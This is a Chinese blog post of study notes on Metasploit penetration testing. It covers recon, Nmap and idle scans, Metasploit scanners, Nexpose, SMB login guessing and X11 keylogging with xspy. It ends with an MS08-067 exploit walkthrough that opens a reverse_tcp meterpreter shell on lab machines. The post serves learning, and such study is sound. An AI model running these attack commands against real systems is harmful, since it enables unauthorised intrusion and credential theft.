<!doctype html>
<html lang="zh"><head><meta charset="utf-8"><meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"><meta><title>Metasploit 笔记 - 饱食终日，无所事事</title><link rel="manifest" href="/manifest.json"><meta name="application-name" content="饱食终日，无所事事"><meta name="msapplication-TileImage" content="/img/favicon.svg"><meta name="apple-mobile-web-app-capable" content="yes"><meta name="apple-mobile-web-app-title" content="饱食终日，无所事事"><meta name="apple-mobile-web-app-status-bar-style" content="default"><meta description="基本操作 metasploit 渗透测试指南 小笔记"><meta property="og:type" content="blog"><meta property="og:title" content="Metasploit 笔记"><meta property="og:url" content="http://example.com/2019/10/06/metasploit/"><meta property="og:site_name" content="饱食终日，无所事事"><meta property="og:description" content="基本操作 metasploit 渗透测试指南 小笔记"><meta property="og:locale" content="zh_CN"><meta property="og:image" content="http://example.com/img/og_image.png"><meta property="article:published_time" content="2019-10-06T05:36:32.000Z"><meta property="article:modified_time" content="2020-04-02T11:10:08.407Z"><meta property="article:author" content="lll"><meta property="article:tag" content="渗透测试"><meta property="article:tag" content="metasploit"><meta property="twitter:card" content="summary"><meta property="twitter:image" content="/img/og_image.png"><script type="application/ld+json">{"@context":"https://schema.org","@type":"BlogPosting","mainEntityOfPage":{"@type":"WebPage","@id":"http://example.com/2019/10/06/metasploit/"},"headline":"饱食终日，无所事事","image":["http://example.com/img/og_image.png"],"datePublished":"2019-10-06T05:36:32.000Z","dateModified":"2020-04-02T11:10:08.407Z","author":{"@type":"Person","name":"lll"},"description":"基本操作 metasploit 渗透测试指南 小笔记"}</script><link rel="canonical" href="http://example.com/2019/10/06/metasploit/"><link rel="icon" href="/img/favicon.svg"><link rel="stylesheet" href="https://use.fontawesome.com/releases/v5.12.0/css/all.css"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/highlight.js@9.12.0/styles/atom-one-light.css"><link rel="stylesheet" href="https://fonts.googleapis.com/css2?family=Ubuntu:wght@400;600&amp;family=Source+Code+Pro"><link rel="stylesheet" href="/css/default.css"><style>body>.footer,body>.navbar,body>.section{opacity:0}</style><!--!--><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/cookieconsent@3.1.1/build/cookieconsent.min.css"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/lightgallery@1.6.8/dist/css/lightgallery.min.css"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/justifiedGallery@3.7.0/dist/css/justifiedGallery.min.css"><!--!--><!--!--><script src="https://cdn.jsdelivr.net/npm/pace-js@1.0.2/pace.min.js"></script><!--!--><!--!--><meta name="generator" content="Hexo 5.2.0"></head><body class="is-2-column"><nav class="navbar navbar-main"><div class="container"><div class="navbar-brand justify-content-center"><a class="navbar-item navbar-logo" href="/"><img src="/img/logo.svg" alt="饱食终日，无所事事" height="28"></a></div><div class="navbar-menu"><div class="navbar-start"><a class="navbar-item" href="/">Home</a><a class="navbar-item" href="/archives">Archives</a><a class="navbar-item" href="/categories">Categories</a><a class="navbar-item" href="/tags">Tags</a><a class="navbar-item" href="/about">About</a></div><div class="navbar-end"><a class="navbar-item is-hidden-tablet catalogue" title="目录" href="javascript:;"><i class="fas fa-list-ul"></i></a><a class="navbar-item search" title="搜索" href="javascript:;"><i class="fas fa-search"></i></a></div></div></div></nav><section class="section"><div class="container"><div class="columns"><div class="column order-2 column-main is-8-tablet is-8-desktop is-8-widescreen"><div class="card"><article class="card-content article" role="article"><div class="article-meta is-size-7 is-uppercase level is-mobile"><div class="level-left"><span class="level-item"><time dateTime="2019-10-06T05:36:32.000Z" title="2019-10-06T05:36:32.000Z">2019-10-06</time>发表</span><span class="level-item"><time dateTime="2020-04-02T11:10:08.407Z" title="2020-04-02T11:10:08.407Z">2020-04-02</time>更新</span><span class="level-item"><a class="link-muted" href="/categories/metasploit/">metasploit</a></span><span class="level-item">1 小时读完 (大约7930个字)</span></div></div><h1 class="title is-3 is-size-4-mobile">Metasploit 笔记</h1><div class="content"><p>基本操作</p>
<p>metasploit 渗透测试指南 小笔记</p>
<a id="more"></a>

<h2 id="情报搜集"><a href="#情报搜集" class="headerlink" title="情报搜集"></a>情报搜集</h2><h3 id="被动信息搜集"><a href="#被动信息搜集" class="headerlink" title="被动信息搜集"></a>被动信息搜集</h3><h4 id="whois-查询"><a href="#whois-查询" class="headerlink" title="whois 查询"></a>whois 查询</h4><p>whois 可以查找域名服务器，如果Name Server不属于要测试的站点，则不应该将其作为攻击目标。</p>
<figure class="highlight css"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="selector-tag">whois</span> <span class="selector-tag">testfire</span><span class="selector-class">.net</span></span><br></pre></td></tr></table></figure>

<p>也可以查询IP地址</p>
<figure class="highlight angelscript"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">whois <span class="number">65.61</span><span class="number">.137</span><span class="number">.117</span></span><br></pre></td></tr></table></figure>

<p>如果NetType并不在域名内，可能网站是由提供托管服务的第三方运营的。</p>
<h4 id="Netcraft"><a href="#Netcraft" class="headerlink" title="Netcraft"></a>Netcraft</h4><p><a target="_blank" rel="noopener" href="https://searchdns.netcraft.net/">Netcraft</a>，可以查出服务器的IP地址，例如<code>testfire.net</code>的IP地址是<code>65.61.137.117</code>。</p>
<h4 id="nslookup"><a href="#nslookup" class="headerlink" title="nslookup"></a>nslookup</h4><figure class="highlight routeros"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">nslookup</span><br><span class="line"><span class="builtin-name">set</span> <span class="attribute">type</span>=mx</span><br><span class="line">testfire.net</span><br></pre></td></tr></table></figure>

<p>查到 mail addr 不属于 testfire.net，也不在攻击范围内。</p>
<h4 id="Google-Hacking"><a href="#Google-Hacking" class="headerlink" title="Google Hacking"></a>Google Hacking</h4><p>可以通过搜索关键词 site，将搜索目标限定在网站域名下。搜索<code>site:testfire.net</code>，可以发现有 www demo altoro 三个子域名，而且除了80端口，8080端口也提供web服务。<code>demo.testfire.net</code>域名下存在两个目录遍历的不安全配置缺陷，导致RTF文档敏感文件泄露和ASP源码泄露。在8080端口提供基于 Swagger的AltoroJ API 接口和使用手册。</p>
<p>还可以搜索一些与渗透攻击目标相关的搜索词，比如<code>site:testfire.net admin</code>，可以发现管理员后台登录界面。使用<code>site:testfire.net login</code>可以发现login界面泄露的ASP源码。可以想到这里存在本地文件包含和SQL注入。</p>
<h3 id="主动信息搜集"><a href="#主动信息搜集" class="headerlink" title="主动信息搜集"></a>主动信息搜集</h3><h4 id="使用Nmap进行扫描"><a href="#使用Nmap进行扫描" class="headerlink" title="使用Nmap进行扫描"></a>使用Nmap进行扫描</h4><p>推荐选项 <code>-sS</code>执行一次隐秘的TCP扫描，<code>-Pn</code>不要使用ping命令预先判断主机是否存活，默认所有主机都是存活的，适用于Internet上的渗透测试环境，因为大多数网络不允许ICMP协议通过。</p>
<p>可以加入 <code>-A</code>选项尝试获得深入的服务枚举和旗标获取。</p>
<h4 id="使用数据库"><a href="#使用数据库" class="headerlink" title="使用数据库"></a>使用数据库</h4><p>渗透比较复杂时可以使用数据库。默认使用 postgresql，用<code>db_status</code>可以确认数据库连接情况。</p>
<h5 id="将nmap输出导入-metasploit"><a href="#将nmap输出导入-metasploit" class="headerlink" title="将nmap输出导入 metasploit"></a>将nmap输出导入 metasploit</h5><figure class="highlight routeros"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">nmap -Pn -sS -A -oX Subnet1.xml 192.168.1.0/24</span><br><span class="line"><span class="comment"># 扫描网络，将结果保存在 Subnet1.xml 中</span></span><br><span class="line">db_import Subnet1.xml</span><br><span class="line"><span class="comment"># 将其中的内容导入数据库</span></span><br><span class="line">hosts -c address</span><br><span class="line"><span class="comment"># 核实结果，显示数据库中所有已保存的主机信息</span></span><br></pre></td></tr></table></figure>

<h5 id="TCP空闲扫描"><a href="#TCP空闲扫描" class="headerlink" title="TCP空闲扫描"></a>TCP空闲扫描</h5><p>这种扫描可以冒充网络上另一台主机的IP地址，对目标进行更隐秘的扫描。首先需要定位一台使用递增IP帧标识机制的空闲主机。它的IP帧标识是可以预测的，能够计算出下一个IP帧标识。当我们冒充这台主机的IP地址对目标主机的某个端口进行探测后，如果该空闲主机实际的IP帧标识与预测不同，意味着那个端口可能是开放的。</p>
<p>可以使用<code>scanner/ip/ipidseq</code>模块寻找符合要求的空闲主机。</p>
<figure class="highlight gradle"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">use auxiliary<span class="regexp">/scanner/i</span>p/ipidseq</span><br><span class="line">show <span class="keyword">options</span></span><br></pre></td></tr></table></figure>

<p>显示了执行扫描所需的参数，RHOST参数可以使用IP地址段，如<code>192.168.1.100-192.168.1.200</code>，或者 CIDR 无类型域间选路 地址块，如<code>192.168.1.0/24</code>，使用都好的多个CIDR地址块以及每行包含一个IP地址的IP列表文本文件，如<code>file:/tmp/hostlist.txt</code>。THREADS参数设定扫描的线程数，默认为1。Windows中不要超过16，类UNIX系统不要超过128。</p>
<p>执行扫描：</p>
<figure class="highlight angelscript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">set</span> RHOSTS <span class="number">192.168</span><span class="number">.1</span><span class="number">.0</span>/<span class="number">24</span></span><br><span class="line"><span class="keyword">set</span> THREADS <span class="number">50</span></span><br><span class="line">run</span><br></pre></td></tr></table></figure>

<p>在扫描结果中可以发现可用于扫描的主机，例如<code>192.168.1.131</code>，可以使用 nmap 的<code>-sI</code>选项指定这台主机作为空闲主机对目标进行扫描。</p>
<figure class="highlight angelscript"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">nmap -Pn -sI <span class="number">192.168</span><span class="number">.1</span><span class="number">.131</span> <span class="number">192.168</span><span class="number">.1</span><span class="number">.201</span></span><br></pre></td></tr></table></figure>

<p>这种方法不用自身IP想目标主机发送信息。</p>
<h5 id="在msf终端运行nmap"><a href="#在msf终端运行nmap" class="headerlink" title="在msf终端运行nmap"></a>在msf终端运行nmap</h5><p>msfconsole 中连接数据库后，可以使用 <code>db_nmap</code>命令，把nmap结果存储在数据库中。</p>
<figure class="highlight angelscript"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">db_nmap -sS -A <span class="number">192.168</span><span class="number">.1</span><span class="number">.201</span></span><br></pre></td></tr></table></figure>

<p>可以执行services 命令查看数据库中关于系统上运行服务的扫描结果：</p>
<figure class="highlight ebnf"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="attribute">services -u</span></span><br></pre></td></tr></table></figure>

<h4 id="使用-metasploit-进行端口扫描"><a href="#使用-metasploit-进行端口扫描" class="headerlink" title="使用 metasploit 进行端口扫描"></a>使用 metasploit 进行端口扫描</h4><p>除了第三方扫描器，辅助模块中也包含了内建的端口扫描器，有时这些扫描器更具有优势。例如贡献了一台位于防火墙之后使用NAT的主机，这台主机使用无法从Internet直接连接的私有IP，如果希望使用 metasploit 对NAT后的主机进行攻击，可以使用已攻陷的主机作为跳板，将流量传送到内部的主机。</p>
<p>查看提供的扫描工具，本例中使用 SYN 端口扫描器：</p>
<figure class="highlight stata"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">search</span> portscan</span><br><span class="line"><span class="keyword">use</span> auxiliary/scanner/portscan/syn</span><br><span class="line"><span class="keyword">set</span> RHOSTS 192.168.1.201</span><br><span class="line"><span class="keyword">set</span> THREADS 50</span><br><span class="line"><span class="keyword">run</span></span><br></pre></td></tr></table></figure>

<h3 id="针对性扫描"><a href="#针对性扫描" class="headerlink" title="针对性扫描"></a>针对性扫描</h3><p>举例来说，在目标网络中快速扫描存在 MS08-067 漏洞的主机很常见，因为这是一个普遍存在的安全漏洞，并且能轻松获得 SYSTEM 权限。</p>
<h4 id="服务器消息块协议扫描"><a href="#服务器消息块协议扫描" class="headerlink" title="服务器消息块协议扫描"></a>服务器消息块协议扫描</h4><p>可以利用<code>smb_version</code>模块遍历一个网络，并获取Windows版本号。</p>
<figure class="highlight angelscript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">use auxiliary/scanner/smb/smb_version</span><br><span class="line">show options</span><br><span class="line"><span class="keyword">set</span> RHOSTS <span class="number">192.168</span><span class="number">.1</span><span class="number">.201</span></span><br><span class="line">run</span><br></pre></td></tr></table></figure>

<p>稍后可以使用 hosts 查看保存的结果。</p>
<h4 id="搜寻配置不当的-Microsoft-SQL-Server"><a href="#搜寻配置不当的-Microsoft-SQL-Server" class="headerlink" title="搜寻配置不当的 Microsoft SQL Server"></a>搜寻配置不当的 Microsoft SQL Server</h4><p>MS SQL 默认监听TCP 1433 端口，如果使用了随机的TCP端口，可以对UDP 1434 进行查询来获得这个随机的端口号。Metasploit 中有 <code>mssql_ping</code>模块实现。</p>
<figure class="highlight angelscript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">use auxiliary/scanner/mssql/mssql_ping</span><br><span class="line">show options</span><br><span class="line"><span class="keyword">set</span> RHOSTS <span class="number">192.168</span><span class="number">.1</span><span class="number">.0</span>/<span class="number">24</span></span><br><span class="line"><span class="keyword">set</span> THREADS <span class="number">255</span></span><br><span class="line">run</span><br></pre></td></tr></table></figure>

<h4 id="SSH-服务器扫描"><a href="#SSH-服务器扫描" class="headerlink" title="SSH 服务器扫描"></a>SSH 服务器扫描</h4><p><code>ssh_version</code>可以识别SSH版本。</p>
<figure class="highlight angelscript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">use auxiliary/scanner/ssh/ssh_version</span><br><span class="line"><span class="keyword">set</span> RHOSTS <span class="number">192.168</span><span class="number">.67</span><span class="number">.0</span>/<span class="number">24</span></span><br><span class="line"><span class="keyword">set</span> THREADS <span class="number">50</span></span><br><span class="line">run</span><br></pre></td></tr></table></figure>

<h4 id="FTP-扫描"><a href="#FTP-扫描" class="headerlink" title="FTP 扫描"></a>FTP 扫描</h4><figure class="highlight angelscript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">use auxiliary/scanner/ftp/ftp_version</span><br><span class="line"><span class="keyword">set</span> RHOSTS <span class="number">192.168</span><span class="number">.67</span><span class="number">.0</span>/<span class="number">24</span></span><br><span class="line"><span class="keyword">set</span> THREADS <span class="number">255</span></span><br><span class="line">run</span><br></pre></td></tr></table></figure>

<p>检查是否允许匿名登录，以及匿名用户的权限</p>
<figure class="highlight angelscript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">use auxiliary/scanner/ftp/anonymous</span><br><span class="line"><span class="keyword">set</span> RHOSTS <span class="number">192.168</span><span class="number">.67</span><span class="number">.0</span>/<span class="number">24</span></span><br><span class="line"><span class="keyword">set</span> THREADS <span class="number">50</span></span><br><span class="line">run</span><br></pre></td></tr></table></figure>

<h4 id="简单网管协议扫描"><a href="#简单网管协议扫描" class="headerlink" title="简单网管协议扫描"></a>简单网管协议扫描</h4><p>SNMP 常用于网络设备，提供系统信息。模块<code>scanner/snmp/snmp_enum</code>，如果能够获取制度或者读写的团体字符串，将发挥重要作用，提供许多重要信息。短体字符串基本等同于查询设备信息或者写入设备配置参数所需的口令。得到团体字符串后，利用<code>scanner/snmp/snmp_login</code>模块可以尝试对一个IP或者一段IP使用字典破解团体字符串。</p>
<figure class="highlight angelscript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">use auxiliary/scanner/snmp/snmp_login</span><br><span class="line"><span class="keyword">set</span> RHOSTS <span class="number">192.168</span><span class="number">.1</span><span class="number">.0</span>/<span class="number">24</span></span><br><span class="line"><span class="keyword">set</span> THREADS <span class="number">50</span></span><br><span class="line">run</span><br></pre></td></tr></table></figure>

<h3 id="编写自己的扫描器"><a href="#编写自己的扫描器" class="headerlink" title="编写自己的扫描器"></a>编写自己的扫描器</h3><!-- 学了Ruby再说 -->

<h2 id="漏洞扫描"><a href="#漏洞扫描" class="headerlink" title="漏洞扫描"></a>漏洞扫描</h2><p>使用漏洞扫描器通常会在网络上产生大量流量，如果渗透测试工作不需要隐秘进行，使用漏洞扫描器非常方便。</p>
<h3 id="基本的漏洞扫描"><a href="#基本的漏洞扫描" class="headerlink" title="基本的漏洞扫描"></a>基本的漏洞扫描</h3><p>使用 netcat 获取目标的旗标。一旦连接到一个服务端口或向他们发送特定指令时，就可以获得旗标，例如Web服务器。</p>
<figure class="highlight angelscript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">nc <span class="number">192.168</span><span class="number">.67</span><span class="number">.140</span></span><br><span class="line">GET HTTP/<span class="number">1.1</span></span><br></pre></td></tr></table></figure>

<p>会回复一个 400 错误，并说明服务器是 IIS 5.1，可以据此查找已知漏洞。</p>
<p>漏洞扫描器有时存在误报和漏报，常用的漏洞扫描器包括 Nexpose, Nessus 和一些专项扫描器。</p>
<h3 id="使用-Nexpose-进行扫描"><a href="#使用-Nexpose-进行扫描" class="headerlink" title="使用 Nexpose 进行扫描"></a>使用 Nexpose 进行扫描</h3><p>扫描的目标是一个默认安装的 Windows XP SP2 主机，首先进行一次公开的白盒扫描，然后将结果导入 Metasploit。同时也可以在 MSF终端 调用Nexpose。</p>
<h4 id="配置"><a href="#配置" class="headerlink" title="配置"></a>配置</h4><p>启动服务后，访问<code>https://localhost:3780</code>，接受Nexpose签发的服务器整数，用安装时设定的用户名和密码登录，并完成激活。</p>
<p>标签页：</p>
<ul>
<li>资产（Assets）显示已经扫描过的计算机和设备</li>
<li>报告（Report）列出扫描后生成的报告</li>
<li>漏洞（Vulnerabilities）对在网络上发现的漏洞进行详细描述</li>
<li>管理（Administration）可以对系统配置进行修改</li>
</ul>
<p>有创建站点向导、手动扫描向导、生成报告向导可以使用。</p>
<h4 id="将扫描报告导入-Metasploit"><a href="#将扫描报告导入-Metasploit" class="headerlink" title="将扫描报告导入 Metasploit"></a>将扫描报告导入 Metasploit</h4><p>完成了一次完整的漏洞扫描后，在 msfconsole 中使用 <code>db_nonect</code> 创建一个新数据库，使用<code>db_import</code>将Nexpose的 XML 格式扫描报告文件导入数据库。Metasploit会识别出文件是由 Nexpose 生成的，并将扫描结果导入。随后使用<code>db_hosts</code>查看导入是否成功。</p>
<figure class="highlight angelscript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">db_connect postgres:<span class="symbol">toor@</span><span class="number">127.0</span><span class="number">.0</span><span class="number">.1</span>/msf3</span><br><span class="line">db_import /tmp/host_195.xml</span><br><span class="line">db_hosts -c address,svcs,vulns</span><br></pre></td></tr></table></figure>

<p>如果想显示导入漏洞的详情可以使用<code>db_vulns</code>。</p>
<h4 id="在-MSF-控制台中运行-Nexpose"><a href="#在-MSF-控制台中运行-Nexpose" class="headerlink" title="在 MSF 控制台中运行 Nexpose"></a>在 MSF 控制台中运行 Nexpose</h4><p>Metasploit 中包含 Nexpose 插件，可以在MSF终端中完成漏洞扫描。扫描之前需要使用<code>db_connect</code>创建新的数据库。</p>
<figure class="highlight angelscript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">db_connect posttgres:<span class="symbol">toor@</span><span class="number">127.0</span><span class="number">.0</span><span class="number">.1</span>/msf3</span><br><span class="line">load nexpose</span><br></pre></td></tr></table></figure>

<p>使用<code>help</code>可以获得此插件的命令。第一次扫描之前需要连接到所安装的 Nexpose 实例，输入<code>nexpose_connect -h</code>可以显示连接参数，在这里需要提供连接 Nexpose 需要的用户名、密码和IP地址，在最后加上 ok 参数表示接受SSL证书警告。</p>
<figure class="highlight angelscript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">nexpose_connect -h</span><br><span class="line">nexpose_connect username:<span class="symbol">password@</span><span class="number">127.0</span><span class="number">.0</span><span class="number">.1</span> ok</span><br><span class="line">nexpose_scan <span class="number">192.168</span><span class="number">.67</span><span class="number">.140</span></span><br></pre></td></tr></table></figure>

<p>扫描结束后，结果保存在了数据库中。</p>
<figure class="highlight routeros"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">db_hosts -c address</span><br><span class="line">db_vulns</span><br></pre></td></tr></table></figure>

<h3 id="使用-Nessus-进行扫描"><a href="#使用-Nessus-进行扫描" class="headerlink" title="使用 Nessus 进行扫描"></a>使用 Nessus 进行扫描</h3><h3 id="专用漏洞扫描器"><a href="#专用漏洞扫描器" class="headerlink" title="专用漏洞扫描器"></a>专用漏洞扫描器</h3><h4 id="验证SMB登录"><a href="#验证SMB登录" class="headerlink" title="验证SMB登录"></a>验证SMB登录</h4><p>这种扫描会留下大量记录</p>
<figure class="highlight gams"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">use auxiliary/scanner/smb/smb_login</span><br><span class="line">show <span class="keyword">options</span></span><br><span class="line"><span class="keyword">set</span> RHOSTS <span class="comment">192.168.67.140</span></span><br><span class="line"><span class="keyword">set</span> <span class="comment">SMBUser administrator</span></span><br><span class="line"><span class="keyword">set</span> <span class="comment">SMBPass 123456</span></span><br><span class="line"><span class="keyword">set</span> <span class="comment">VERBOSE false</span></span><br><span class="line">run</span><br></pre></td></tr></table></figure>

<h4 id="扫描开放的VNC空口令"><a href="#扫描开放的VNC空口令" class="headerlink" title="扫描开放的VNC空口令"></a>扫描开放的VNC空口令</h4><p>新版本的VNC不允许空口令</p>
<figure class="highlight angelscript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">use auxiliary/scanner/vnc/vnc_none_auth</span><br><span class="line">show options</span><br><span class="line"><span class="keyword">set</span> RHOSTS <span class="number">192.168</span><span class="number">.67</span><span class="number">.140</span></span><br><span class="line">run</span><br></pre></td></tr></table></figure>

<h4 id="扫描开放的X11服务器"><a href="#扫描开放的X11服务器" class="headerlink" title="扫描开放的X11服务器"></a>扫描开放的X11服务器</h4><figure class="highlight gams"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">use auxiliary/scanner/x11/open_x11</span><br><span class="line">show <span class="keyword">options</span></span><br><span class="line"><span class="keyword">set</span> RHOSTS <span class="comment">192.168.67.140</span></span><br><span class="line"><span class="keyword">set</span> <span class="comment">THREADS 50</span></span><br><span class="line">run</span><br></pre></td></tr></table></figure>

<p>如果发现了漏洞，可以利用<code>xspy</code>记录键盘输入。</p>
<figure class="highlight angelscript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">cd /pentest/sniffers/xspy/</span><br><span class="line">./xspy -display <span class="number">192.168</span><span class="number">.67</span><span class="number">.140</span> -delay <span class="number">100</span></span><br></pre></td></tr></table></figure>

<h2 id="渗透攻击之旅"><a href="#渗透攻击之旅" class="headerlink" title="渗透攻击之旅"></a>渗透攻击之旅</h2><h3 id="渗透攻击基础"><a href="#渗透攻击基础" class="headerlink" title="渗透攻击基础"></a>渗透攻击基础</h3><figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">show</span> exploits	<span class="comment"># 显示所有可用的攻击模块</span></span><br><span class="line"><span class="keyword">show</span> auxiliary	<span class="comment"># 显示所有辅助模块和他们的用途</span></span><br><span class="line"><span class="keyword">show</span> options 	<span class="comment"># 选择模块后，列出所需的参数</span></span><br><span class="line">back 			<span class="comment"># 回到上一个状态</span></span><br><span class="line"><span class="keyword">search</span> &lt;<span class="keyword">module</span>&gt;	<span class="comment"># 查找特定的模块/漏洞</span></span><br><span class="line"><span class="keyword">use</span> &lt;<span class="keyword">module</span>&gt; 	<span class="comment"># 加载模块，此时命令提示符会变化</span></span><br><span class="line"><span class="keyword">show</span> payloads	<span class="comment"># 查看可用payload</span></span><br><span class="line"><span class="keyword">set</span> payload &lt;payload&gt; <span class="comment"># 选择payload</span></span><br><span class="line"><span class="keyword">show</span> targets	<span class="comment"># 列出受影响的系统</span></span><br><span class="line">info 			<span class="comment"># 提供正在使用的模块的详细信息</span></span><br></pre></td></tr></table></figure>

<p>模块中的参数只有两个状态，set 和 unset。有些参数是必填的（required），必须手工设置并且处于启用状态。使用 set 命令可以对某个参数进行设置并启用，unset 可以禁用相关参数。</p>
<figure class="highlight gams"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">set</span> RHOST <span class="comment">192.168.67.140</span></span><br><span class="line"><span class="keyword">set</span> <span class="comment">TARGET 4</span></span><br><span class="line">show <span class="comment">options</span></span><br><span class="line">unset <span class="comment">RHOST</span></span><br></pre></td></tr></table></figure>

<p>setg 和 unsetg 是上面两个的全局版本，有些参数不会经常改变，比如 LHOST 可以通过setg 设置。</p>
<p>save 命令可以把使用 setg 设置的全局参数保存下来，下次启动 msfconsole 时可以继续使用。在任何时候都可以使用 save 保存当前状态。</p>
<h3 id="攻击-Windows"><a href="#攻击-Windows" class="headerlink" title="攻击 Windows"></a>攻击 Windows</h3><p>靶机：Windows XP SP2 和 Ubuntu 9.04，Windows 配置了 IIS 和 SQL Server。</p>
<p>利用 MS08-067 漏洞</p>
<p>使用 nmap 扫描脚本，扫描Windows</p>
<figure class="highlight angelscript"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">nmap -sT -A --script=smb-vuln-ms08<span class="number">-067</span> -P0 <span class="number">192.168</span><span class="number">.67</span><span class="number">.140</span></span><br></pre></td></tr></table></figure>

<p><code>-sT</code>隐秘的tcp连接扫描，<code>-A</code>高级系统探测功能，扫描结果显示<code>MS08-067: VULNERABLE</code>。</p>
<p>MS08-067 漏洞高度依赖于系统版本，所以我们手动指定目标版本，保证能触发正确的一处代码。</p>
<figure class="highlight gams"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">search ms08_067_netapi</span><br><span class="line">use exploit/windows/smb/ms08_067_netapi</span><br><span class="line"><span class="keyword">set</span> PAYLOAD <span class="comment">windows</span>/meterpreter/<span class="comment">reverse_tcp</span></span><br><span class="line">show <span class="comment">targets</span></span><br><span class="line"><span class="keyword">set</span> <span class="comment">TARGET 4</span></span><br><span class="line"><span class="keyword">set</span> <span class="comment">RHOST 192.168.67.140</span></span><br><span class="line"><span class="keyword">set</span> <span class="comment">LHOST 192.168.67.136</span></span><br><span class="line"><span class="keyword">set</span> <span class="comment">LPORT 8080</span></span><br><span class="line">show <span class="comment">options</span></span><br><span class="line">exploit</span><br></pre></td></tr></table></figure>

<p>先查找 MS08-067 的攻击模块，使用 use 加载。设置 payload 位基于 Windows 的 reverse_tcp，这个模块会从目标主机发起一个反弹连接，连接到 LHOST，可以绕过防火墙或者穿透 NAT 网关。show targets 让我们识别和匹配目标操作系统类型（多数模块会自动识别），指定了系统。 Windows XP SP2 English（AlwaysOn NX）意思时不允许执行，即启用 DEP 保护（默认）。设置 RHOST 指定目标， LHOST LPORT 指定监听的TCP端口（使用常见端口可以帮助绕过防火墙）。show options 确认参数都已经设置正确。exploit 初始化攻击环境，并开始对目标进行攻击尝试，成功会返回一个 reverse tcp 方式的 meterpreter 会话。</p>
<p>此时可以使用 <code>session -l</code> 查看远程运行的 meterpreter 状况。如果同时对多个目标进行了攻击，会同时开启多个会话。<code>sessions -i 1</code>指与ID为 1 的控制会话交互。如果这个会话是一个反向连接命令行 shell，这个命令会把我们带到命令提示符状态下。输入 <code>shell</code>，进入目标系统的交互命令行shell。</p>
<h3 id="攻击-Metasploitable"><a href="#攻击-Metasploitable" class="headerlink" title="攻击 Metasploitable"></a>攻击 Metasploitable</h3><p>与上面类似</p>
